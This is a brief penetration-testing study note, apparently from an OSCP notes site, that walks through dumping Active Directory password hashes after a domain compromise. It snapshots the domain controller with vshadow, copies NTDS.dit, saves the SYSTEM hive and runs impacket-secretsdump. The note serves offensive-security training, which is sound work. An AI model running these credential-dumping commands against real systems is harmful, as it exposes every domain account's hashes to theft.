// notes/ Active Directory
🏛️

Post Domain Compromise Shadow Copies

Use the MS signed vshadow tool to take a snapshot of the Domain Controller

#active directory#adot8
source · oscp.adot8.com · active-directory/post-domain-compromise_shadow-copies

Shadow Copies

Use the MS signed vshadow tool to take a snapshot of the Domain Controller

code
01vshadow.exe -nw -p C:

Find the Shadow copy device name

{% hint style="info" %} Could look something like this \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2 {% endhint %}

Make a new NTDS.dit

copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

Grab the system hive

code
01reg.exe save hklm\system c:\system.bak

Dump NTDS.dit locally

code
01impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL